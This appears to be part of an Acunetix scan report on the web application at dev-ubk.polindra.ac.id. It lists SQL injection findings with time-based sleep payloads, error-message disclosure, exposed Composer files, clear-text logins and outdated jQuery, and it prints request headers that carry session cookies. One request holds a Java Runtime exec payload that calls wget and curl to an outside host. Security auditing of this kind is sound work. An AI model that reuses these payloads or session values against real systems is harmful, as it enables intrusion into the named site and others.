columns[0][data]=id_jurusan&columns[0][name]=&columns[0][orderable]=false&columns[0]
[search][regex]=false&columns[0][search][value]=&columns[0][searchable]=false&columns[1]
[data]=
(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'"%2B(select
(0)from(select(sleep(6)))v)%2B"*/&columns[1][name]=&columns[1][orderable]=true&columns[1]
[search][regex]=false&columns[1][search][value]=&columns[1][searchable]=true&columns[2]
[data]=bulk_select&columns[2][name]=&columns[2][orderable]=false&columns[2][search]
[regex]=false&columns[2][search][value]=&columns[2]
[searchable]=false&csrf_test_name=3b88cd89d8fcecd13ee41aa591693f15&draw=1&length=10&order
[0][column]=1&order[0][dir]=asc&search[regex]=false&search[value]=&start=0

52
/kelas/data
Details
URL encoded POST input columns[1][data] was set to 1'"

Error message found:

You have an error in your SQL syntax

Request headers
POST /kelas/data HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/dashboard

Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7

Content-Type: application/x-www-form-urlencoded

Content-Length: 782

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

columns[0][data]=id_kelas&columns[0][name]=&columns[0][orderable]=false&columns[0]
[search][regex]=false&columns[0][search][value]=&columns[0][searchable]=false&columns[1]
[data]=1'"&columns[1][name]=&columns[1][orderable]=true&columns[1][search]
[regex]=false&columns[1][search][value]=&columns[1][searchable]=true&columns[2]
[data]=nama_jurusan&columns[2][name]=&columns[2][orderable]=true&columns[2][search]
[regex]=false&columns[2][search][value]=&columns[2][searchable]=true&columns[3]
[data]=bulk_select&columns[3][name]=&columns[3][orderable]=false&columns[3][search]
[regex]=false&columns[3][search][value]=&columns[3]
[searchable]=false&csrf_test_name=3b88cd89d8fcecd13ee41aa591693f15&draw=1&length=10&order
[0][column]=1&order[0][dir]=asc&search[regex]=false&search[value]=&start=0
/kelas/data
Details
URL encoded POST input columns[2][data] was set to 1'"

Error message found:

You have an error in your SQL syntax

Request headers

53
POST /kelas/data HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/dashboard

Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7

Content-Type: application/x-www-form-urlencoded

Content-Length: 781

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

columns[0][data]=id_kelas&columns[0][name]=&columns[0][orderable]=false&columns[0]
[search][regex]=false&columns[0][search][value]=&columns[0][searchable]=false&columns[1]
[data]=nama_kelas&columns[1][name]=&columns[1][orderable]=true&columns[1][search]
[regex]=false&columns[1][search][value]=&columns[1][searchable]=true&columns[2]
[data]=1'"&columns[2][name]=&columns[2][orderable]=true&columns[2][search]
[regex]=false&columns[2][search][value]=&columns[2][searchable]=true&columns[3]
[data]=bulk_select&columns[3][name]=&columns[3][orderable]=false&columns[3][search]
[regex]=false&columns[3][search][value]=&columns[3]
[searchable]=false&csrf_test_name=3b88cd89d8fcecd13ee41aa591693f15&draw=2&length=10&order
[0][column]=1&order[0][dir]=asc&search[regex]=false&search[value]=e&start=0
/mahasiswa/data
Details
URL encoded POST input columns[1][data] was set to 1'"

Error message found:

You have an error in your SQL syntax

Request headers

54
POST /mahasiswa/data HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/dashboard

Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7

Content-Type: application/x-www-form-urlencoded

Content-Length: 1459

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

columns[0][data]=id_mahasiswa&columns[0][name]=&columns[0][orderable]=false&columns[0]
[search][regex]=false&columns[0][search][value]=&columns[0][searchable]=false&columns[1]
[data]=1'"&columns[1][name]=&columns[1][orderable]=true&columns[1][search]
[regex]=false&columns[1][search][value]=&columns[1][searchable]=true&columns[2]
[data]=nama&columns[2][name]=&columns[2][orderable]=true&columns[2][search]
[regex]=false&columns[2][search][value]=&columns[2][searchable]=true&columns[3]
[data]=email&columns[3][name]=&columns[3][orderable]=true&columns[3][search]
[regex]=false&columns[3][search][value]=&columns[3][searchable]=true&columns[4]
[data]=nama_kelas&columns[4][name]=&columns[4][orderable]=true&columns[4][search]
[regex]=false&columns[4][search][value]=&columns[4][searchable]=true&columns[5]
[data]=nama_jurusan&columns[5][name]=&columns[5][orderable]=true&columns[5][search]
[regex]=false&columns[5][search][value]=&columns[5][searchable]=true&columns[6][data]
[ada]=ada&columns[6][data][id_mahasiswa]=id_mahasiswa&columns[6][name]=&columns[6]
[orderable]=true&columns[6][search][regex]=false&columns[6][search][value]=&columns[6]
[searchable]=false&columns[7][data]=id_mahasiswa&columns[7][name]=&columns[7]
[orderable]=true&columns[7][search][regex]=false&columns[7][search][value]=&columns[7]
[searchable]=true&csrf_test_name=3b88cd89d8fcecd13ee41aa591693f15&draw=6&length=50&order[
0][column]=1&order[0][dir]=desc&search[regex]=false&search[value]=e&start=0
/mahasiswa/data
Details
URL encoded POST input columns[2][data] was set to 1'"

Error message found:

You have an error in your SQL syntax

Request headers

55
POST /mahasiswa/data HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/dashboard

Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7

Content-Type: application/x-www-form-urlencoded

Content-Length: 1458

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

columns[0][data]=id_mahasiswa&columns[0][name]=&columns[0][orderable]=false&columns[0]
[search][regex]=false&columns[0][search][value]=&columns[0][searchable]=false&columns[1]
[data]=nim&columns[1][name]=&columns[1][orderable]=true&columns[1][search]
[regex]=false&columns[1][search][value]=&columns[1][searchable]=true&columns[2]
[data]=1'"&columns[2][name]=&columns[2][orderable]=true&columns[2][search]
[regex]=false&columns[2][search][value]=&columns[2][searchable]=true&columns[3]
[data]=email&columns[3][name]=&columns[3][orderable]=true&columns[3][search]
[regex]=false&columns[3][search][value]=&columns[3][searchable]=true&columns[4]
[data]=nama_kelas&columns[4][name]=&columns[4][orderable]=true&columns[4][search]
[regex]=false&columns[4][search][value]=&columns[4][searchable]=true&columns[5]
[data]=nama_jurusan&columns[5][name]=&columns[5][orderable]=true&columns[5][search]
[regex]=false&columns[5][search][value]=&columns[5][searchable]=true&columns[6][data]
[ada]=ada&columns[6][data][id_mahasiswa]=id_mahasiswa&columns[6][name]=&columns[6]
[orderable]=true&columns[6][search][regex]=false&columns[6][search][value]=&columns[6]
[searchable]=false&columns[7][data]=id_mahasiswa&columns[7][name]=&columns[7]
[orderable]=true&columns[7][search][regex]=false&columns[7][search][value]=&columns[7]
[searchable]=true&csrf_test_name=3b88cd89d8fcecd13ee41aa591693f15&draw=6&length=50&order[
0][column]=1&order[0][dir]=desc&search[regex]=false&search[value]=e&start=0
/mahasiswa/data
Details
URL encoded POST input columns[3][data] was set to 1'"

Error message found:

You have an error in your SQL syntax

Request headers

56
POST /mahasiswa/data HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/dashboard

Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7

Content-Type: application/x-www-form-urlencoded

Content-Length: 1457

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

columns[0][data]=id_mahasiswa&columns[0][name]=&columns[0][orderable]=false&columns[0]
[search][regex]=false&columns[0][search][value]=&columns[0][searchable]=false&columns[1]
[data]=nim&columns[1][name]=&columns[1][orderable]=true&columns[1][search]
[regex]=false&columns[1][search][value]=&columns[1][searchable]=true&columns[2]
[data]=nama&columns[2][name]=&columns[2][orderable]=true&columns[2][search]
[regex]=false&columns[2][search][value]=&columns[2][searchable]=true&columns[3]
[data]=1'"&columns[3][name]=&columns[3][orderable]=true&columns[3][search]
[regex]=false&columns[3][search][value]=&columns[3][searchable]=true&columns[4]
[data]=nama_kelas&columns[4][name]=&columns[4][orderable]=true&columns[4][search]
[regex]=false&columns[4][search][value]=&columns[4][searchable]=true&columns[5]
[data]=nama_jurusan&columns[5][name]=&columns[5][orderable]=true&columns[5][search]
[regex]=false&columns[5][search][value]=&columns[5][searchable]=true&columns[6][data]
[ada]=ada&columns[6][data][id_mahasiswa]=id_mahasiswa&columns[6][name]=&columns[6]
[orderable]=true&columns[6][search][regex]=false&columns[6][search][value]=&columns[6]
[searchable]=false&columns[7][data]=id_mahasiswa&columns[7][name]=&columns[7]
[orderable]=true&columns[7][search][regex]=false&columns[7][search][value]=&columns[7]
[searchable]=true&csrf_test_name=3b88cd89d8fcecd13ee41aa591693f15&draw=6&length=50&order[
0][column]=1&order[0][dir]=desc&search[regex]=false&search[value]=e&start=0
/mahasiswa/data
Details
URL encoded POST input columns[4][data] was set to 1'"

Error message found:

You have an error in your SQL syntax

Request headers

57
POST /mahasiswa/data HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/dashboard

Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7

Content-Type: application/x-www-form-urlencoded

Content-Length: 1452

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

columns[0][data]=id_mahasiswa&columns[0][name]=&columns[0][orderable]=false&columns[0]
[search][regex]=false&columns[0][search][value]=&columns[0][searchable]=false&columns[1]
[data]=nim&columns[1][name]=&columns[1][orderable]=true&columns[1][search]
[regex]=false&columns[1][search][value]=&columns[1][searchable]=true&columns[2]
[data]=nama&columns[2][name]=&columns[2][orderable]=true&columns[2][search]
[regex]=false&columns[2][search][value]=&columns[2][searchable]=true&columns[3]
[data]=email&columns[3][name]=&columns[3][orderable]=true&columns[3][search]
[regex]=false&columns[3][search][value]=&columns[3][searchable]=true&columns[4]
[data]=1'"&columns[4][name]=&columns[4][orderable]=true&columns[4][search]
[regex]=false&columns[4][search][value]=&columns[4][searchable]=true&columns[5]
[data]=nama_jurusan&columns[5][name]=&columns[5][orderable]=true&columns[5][search]
[regex]=false&columns[5][search][value]=&columns[5][searchable]=true&columns[6][data]
[ada]=ada&columns[6][data][id_mahasiswa]=id_mahasiswa&columns[6][name]=&columns[6]
[orderable]=true&columns[6][search][regex]=false&columns[6][search][value]=&columns[6]
[searchable]=false&columns[7][data]=id_mahasiswa&columns[7][name]=&columns[7]
[orderable]=true&columns[7][search][regex]=false&columns[7][search][value]=&columns[7]
[searchable]=true&csrf_test_name=3b88cd89d8fcecd13ee41aa591693f15&draw=6&length=50&order[
0][column]=1&order[0][dir]=desc&search[regex]=false&search[value]=e&start=0
/mahasiswa/data
Details
URL encoded POST input columns[5][data] was set to 1'"

Error message found:

You have an error in your SQL syntax

Request headers

58
POST /mahasiswa/data HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/dashboard

Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7

Content-Type: application/x-www-form-urlencoded

Content-Length: 1450

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

columns[0][data]=id_mahasiswa&columns[0][name]=&columns[0][orderable]=false&columns[0]
[search][regex]=false&columns[0][search][value]=&columns[0][searchable]=false&columns[1]
[data]=nim&columns[1][name]=&columns[1][orderable]=true&columns[1][search]
[regex]=false&columns[1][search][value]=&columns[1][searchable]=true&columns[2]
[data]=nama&columns[2][name]=&columns[2][orderable]=true&columns[2][search]
[regex]=false&columns[2][search][value]=&columns[2][searchable]=true&columns[3]
[data]=email&columns[3][name]=&columns[3][orderable]=true&columns[3][search]
[regex]=false&columns[3][search][value]=&columns[3][searchable]=true&columns[4]
[data]=nama_kelas&columns[4][name]=&columns[4][orderable]=true&columns[4][search]
[regex]=false&columns[4][search][value]=&columns[4][searchable]=true&columns[5]
[data]=1'"&columns[5][name]=&columns[5][orderable]=true&columns[5][search]
[regex]=false&columns[5][search][value]=&columns[5][searchable]=true&columns[6][data]
[ada]=ada&columns[6][data][id_mahasiswa]=id_mahasiswa&columns[6][name]=&columns[6]
[orderable]=true&columns[6][search][regex]=false&columns[6][search][value]=&columns[6]
[searchable]=false&columns[7][data]=id_mahasiswa&columns[7][name]=&columns[7]
[orderable]=true&columns[7][search][regex]=false&columns[7][search][value]=&columns[7]
[searchable]=true&csrf_test_name=3b88cd89d8fcecd13ee41aa591693f15&draw=6&length=50&order[
0][column]=1&order[0][dir]=desc&search[regex]=false&search[value]=e&start=0
/mahasiswa/data
Details
URL encoded POST input columns[7][data] was set to 1'"

Error message found:

You have an error in your SQL syntax

Request headers

59
POST /mahasiswa/data HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/dashboard

Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7

Content-Type: application/x-www-form-urlencoded

Content-Length: 1450

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

columns[0][data]=id_mahasiswa&columns[0][name]=&columns[0][orderable]=false&columns[0]
[search][regex]=false&columns[0][search][value]=&columns[0][searchable]=false&columns[1]
[data]=nim&columns[1][name]=&columns[1][orderable]=true&columns[1][search]
[regex]=false&columns[1][search][value]=&columns[1][searchable]=true&columns[2]
[data]=nama&columns[2][name]=&columns[2][orderable]=true&columns[2][search]
[regex]=false&columns[2][search][value]=&columns[2][searchable]=true&columns[3]
[data]=email&columns[3][name]=&columns[3][orderable]=true&columns[3][search]
[regex]=false&columns[3][search][value]=&columns[3][searchable]=true&columns[4]
[data]=nama_kelas&columns[4][name]=&columns[4][orderable]=true&columns[4][search]
[regex]=false&columns[4][search][value]=&columns[4][searchable]=true&columns[5]
[data]=nama_jurusan&columns[5][name]=&columns[5][orderable]=true&columns[5][search]
[regex]=false&columns[5][search][value]=&columns[5][searchable]=true&columns[6][data]
[ada]=ada&columns[6][data][id_mahasiswa]=id_mahasiswa&columns[6][name]=&columns[6]
[orderable]=true&columns[6][search][regex]=false&columns[6][search][value]=&columns[6]
[searchable]=false&columns[7][data]=1'"&columns[7][name]=&columns[7]
[orderable]=true&columns[7][search][regex]=false&columns[7][search][value]=&columns[7]
[searchable]=true&csrf_test_name=3b88cd89d8fcecd13ee41aa591693f15&draw=6&length=50&order[
0][column]=1&order[0][dir]=desc&search[regex]=false&search[value]=e&start=0

Application error messages

Severity Medium
Reported by module /Scripts/PerScheme/Error_Message.script

Description

This alert requires manual confirmation

Acunetix found one or more error/warning messages. Application error or warning messages may expose sensitive
information about an application's internal workings to an attacker.
These messages may also contain the location of the file that produced an unhandled exception.
Consult the 'Attack details' section for more information about the affected page(s).

Impact

60
Error messages may disclose sensitive information which can be used to escalate attacks.

Recommendation

Verify that these page(s) are disclosing error or warning messages and properly configure the application to log errors to a
file instead of displaying the error to the user.

References

PHP Runtime Configuration (https://www.php.net/manual/en/errorfunc.configuration.php#ini.display-errors)

Improper Error Handling (https://www.owasp.org/index.php/Improper_Error_Handling)

Affected items

Web Server
Details
Application error messages:

http://dev-ubk.polindra.ac.id/users/edit_info
Unknown column 'Array' in 'where clause'

http://dev-ubk.polindra.ac.id/dosen/data
You have an error in your SQL syntax

http://dev-ubk.polindra.ac.id/kelas/data
You have an error in your SQL syntax

http://dev-ubk.polindra.ac.id/mahasiswa/data
You have an error in your SQL syntax

http://dev-ubk.polindra.ac.id/jurusan/data
You have an error in your SQL syntax

http://dev-ubk.polindra.ac.id/kelasdosen/data
You have an error in your SQL syntax

http://dev-ubk.polindra.ac.id/hasilujian/data
You have an error in your SQL syntax

http://dev-ubk.polindra.ac.id/soal/data
You have an error in your SQL syntax

http://dev-ubk.polindra.ac.id/users/data/1
You have an error in your SQL syntax

http://dev-ubk.polindra.ac.id/users/data
You have an error in your SQL syntax

http://dev-ubk.polindra.ac.id/ujian/save
Unknown column 'Array' in 'where clause'

Request headers

61
POST /users/edit_info HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/dashboard

Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7

Content-Type: application/x-www-form-urlencoded

Content-Length: 273

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

csrf_test_name=3b88cd89d8fcecd13ee41aa591693f15&email=sample%40email.tst&first_name=KfnqD
uxw&id[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('wget+http://hitde
atljwbcn.bxss.me/||curl+http://hitdeatljwbcn.bxss.me/')]=1&last_name=KfnqDuxw&username=Kf
nqDuxw

Development configuration files

Severity Medium
Reported by module /Scripts/PerFolder/Development_Files.script

Description

One or more configuration files (e.g. Vagrantfile, Gemfile, Rakefile, ...) were found. These files may expose sensitive
information that could help a malicious user to prepare more advanced attacks. It's recommended to remove or restrict
access to this type of files from production systems.

Impact

These files may disclose sensitive information. This information can be used to launch further attacks.

Recommendation

Remove or restrict access to all configuration files acessible from internet.

Affected items

Web Server
Details

62
Development configuration files:

http://dev-ubk.polindra.ac.id/composer.json

composer.json => Composer configuration file. Composer is a dependency manager for PH

http://dev-ubk.polindra.ac.id/composer.lock

composer.lock => Composer lock file. Composer is a dependency manager for PHP.

Request headers
GET /composer.json HTTP/1.1

Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

Unencrypted connection

Severity Medium
Reported by module /RPA/no_https.js

Description

This scan target was connected to over an unencrypted connection. A potential attacker can intercept and modify data sent
and received from this site.

Impact

Possible information disclosure.

Recommendation

The site should send and receive data over a secure (HTTPS) connection.

Affected items

Web Server
Verified vulnerability
Details

Request headers

63
GET /assets/dist/js/adminlte.min.js HTTP/1.1

Host: dev-ubk.polindra.ac.id

Pragma: no-cache

Cache-Control: no-cache

accept-language: en-US

accept: */*

cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7

Referer: http://dev-ubk.polindra.ac.id/dashboard

Accept-Encoding: gzip,deflate,br

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

User credentials are sent in clear text

Severity Medium
Reported by module /Crawler/12-Crawler_User_Credentials_Plain_Text.js

Description

User credentials are transmitted over an unencrypted channel. This information should always be transferred via an
encrypted channel (HTTPS) to avoid being intercepted by malicious users.

Impact

A third party may be able to read the user credentials by intercepting an unencrypted HTTP connection.

Recommendation

Because user credentials are considered sensitive information, should always be transferred to the server over an
encrypted connection (HTTPS).

Affected items

Web Server
Details

64
Forms with credentials sent in clear text:

http://dev-ubk.polindra.ac.id/auth

Form name: <empty>

Form action: http://dev-ubk.polindra.ac.id/auth/cek_login
Form method: POST
Password input: pass

Request headers
GET /auth HTTP/1.1

Host: dev-ubk.polindra.ac.id

Pragma: no-cache

Cache-Control: no-cache

upgrade-insecure-requests: 1

accept-language: en-US

accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/
*;q=0.8,application/signed-exchange;v=b3;q=0.9

cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=1kpdhd6u0koi17ognqadbu4253f6f6q9

Accept-Encoding: gzip,deflate,br

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Vulnerable JavaScript libraries

Severity Medium
Reported by module /Scripts/PerFile/Javascript_Libraries_Audit.script

Description

You are using one or more vulnerable JavaScript libraries. One or more vulnerabilities were reported for this version of the
library. Consult Attack details and Web References for more information about the affected library and the vulnerabilities
that were reported.

Impact

Consult References for more information.

Recommendation

Upgrade to the latest version.

65
Affected items

Web Server
Verified vulnerability
Details

jQuery 3.3.1
URL: http://dev-ubk.polindra.ac.id/assets/bower_components/jquery/jquery-3.3.1.min.js
Detection method: The library's name and version were determined based on the file's name, and contents.
Acunetix verified the library version and the associated vulnerabilities with the file's unique syntax fingerprint,
which matched the syntax fingerprint expected by Acunetix.
References:
https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/
https://mksben.l0.cm/2020/05/jquery3.5.0-xss.html
https://jquery.com/upgrade-guide/3.5/
https://api.jquery.com/jQuery.htmlPrefilter/

Request headers
GET /assets/bower_components/jquery/jquery-3.3.1.min.js HTTP/1.1

Host: dev-ubk.polindra.ac.id

Pragma: no-cache

Cache-Control: no-cache

accept-language: en-US

accept: */*

cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7

Referer: http://dev-ubk.polindra.ac.id/dashboard

Accept-Encoding: gzip,deflate,br

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Web Server
Verified vulnerability
Details

66
jQuery 3.2.1
URL: http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/jquery/jquery-3.2.1.min.js
Detection method: The library's name and version were determined based on the file's name, and contents.
Acunetix verified the library version and the associated vulnerabilities with the file's unique syntax fingerprint,
which matched the syntax fingerprint expected by Acunetix.
References:
https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/
https://mksben.l0.cm/2020/05/jquery3.5.0-xss.html
https://jquery.com/upgrade-guide/3.5/
https://api.jquery.com/jQuery.htmlPrefilter/

Request headers
GET /assets/dist/auth/vendor/jquery/jquery-3.2.1.min.js HTTP/1.1

Host: dev-ubk.polindra.ac.id

Pragma: no-cache

Cache-Control: no-cache

accept-language: en-US

accept: */*

cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=1kpdhd6u0koi17ognqadbu4253f6f6q9

Referer: http://dev-ubk.polindra.ac.id/auth

Accept-Encoding: gzip,deflate,br

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Clickjacking: X-Frame-Options header

Severity Low
Reported by module /httpdata/X_Frame_Options_not_implemented.js

Description

Clickjacking (User Interface redress attack, UI redress attack, UI redressing) is a malicious technique of tricking a Web user
into clicking on something different from what the user perceives they are clicking on, thus potentially revealing confidential
information or taking control of their computer while clicking on seemingly innocuous web pages.

The server did not return an X-Frame-Options header with the value DENY or SAMEORIGIN, which means that this
website could be at risk of a clickjacking attack. The X-Frame-Options HTTP response header can be used to indicate
whether or not a browser should be allowed to render a page inside a frame or iframe. Sites can use this to avoid
clickjacking attacks, by ensuring that their content is not embedded into untrusted sites.

Impact

67
The impact depends on the affected web application.

Recommendation

Configure your web server to include an X-Frame-Options header and a CSP header with frame-ancestors directive.
Consult Web references for more information about the possible values for this header.

References

The X-Frame-Options response header (https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options)

Clickjacking (https://en.wikipedia.org/wiki/Clickjacking)
OWASP Clickjacking (https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html)
Frame Buster Buster (https://stackoverflow.com/questions/958997/frame-buster-buster-buster-code-needed)

Affected items

Web Server
Details

68
Paths without secure XFO header:

http://dev-ubk.polindra.ac.id/auth

http://dev-ubk.polindra.ac.id/dashboard/hasil_ujian

http://dev-ubk.polindra.ac.id/dashboard/

http://dev-ubk.polindra.ac.id/users/edit/1

http://dev-ubk.polindra.ac.id/dosen

http://dev-ubk.polindra.ac.id/hasilujian

http://dev-ubk.polindra.ac.id/jurusan

http://dev-ubk.polindra.ac.id/jurusan/add

http://dev-ubk.polindra.ac.id/kelas

http://dev-ubk.polindra.ac.id/kelas/add

http://dev-ubk.polindra.ac.id/kelasdosen

http://dev-ubk.polindra.ac.id/mahasiswa

http://dev-ubk.polindra.ac.id/settings

http://dev-ubk.polindra.ac.id/soal

http://dev-ubk.polindra.ac.id/users

http://dev-ubk.polindra.ac.id/ujian/master

http://dev-ubk.polindra.ac.id/soal/import

http://dev-ubk.polindra.ac.id/soal/preview/soal

http://dev-ubk.polindra.ac.id/settings/

http://dev-ubk.polindra.ac.id/soal/preview

http://dev-ubk.polindra.ac.id/soal/

Request headers

69
GET /auth HTTP/1.1

Host: dev-ubk.polindra.ac.id

Pragma: no-cache

Cache-Control: no-cache

upgrade-insecure-requests: 1

accept-language: en-US

accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/
*;q=0.8,application/signed-exchange;v=b3;q=0.9

cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=1kpdhd6u0koi17ognqadbu4253f6f6q9

Accept-Encoding: gzip,deflate,br

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Composer installed.json publicly accessible

Severity Low
Reported by module /location/composer_installed_json.js

Description

A installed.json file was discovered. Composer is a tool for dependency management in PHP. It allows you to declare the
libraries your project depends on and it will manage (install/update) them for you. After installing the dependencies,
Composer stores the list of them in a special file for internal purposes.

As the file is publicly accessible, it leads to disclosure of information about components used by the web application.

Impact

installed.json discloses sensitive information. This information can be used to launch further attacks.

Recommendation

Restrict access to vendors directory

References

Composer Basic usage (https://getcomposer.org/doc/01-basic-usage.md)

Affected items

Web Server

70
Details

Request headers
GET /vendor/composer/installed.json HTTP/1.1

Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

Cookies with missing, inconsistent or contradictory properties

Severity Low
Reported by module /RPA/Cookie_Validator.js

Description

At least one of the following cookies properties causes the cookie to be invalid or incompatible with either a different
property of the same cookie, of with the environment the cookie is being used in. Although this is not a vulnerability in itself,
it will likely lead to unexpected behavior by the application, which in turn may cause secondary security issues.

Impact

Cookies will not be stored, or submitted, by web browsers.

Recommendation

Ensure that the cookies configuration complies with the applicable standards.

References

MDN | Set-Cookie (https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie)

Securing cookies with cookie prefixes (https://www.sjoerdlangkemper.nl/2017/02/09/cookie-prefixes/)
Cookies: HTTP State Management Mechanism (https://tools.ietf.org/html/draft-ietf-httpbis-rfc6265bis-05)
SameSite Updates - The Chromium Projects (https://www.chromium.org/updates/same-site)
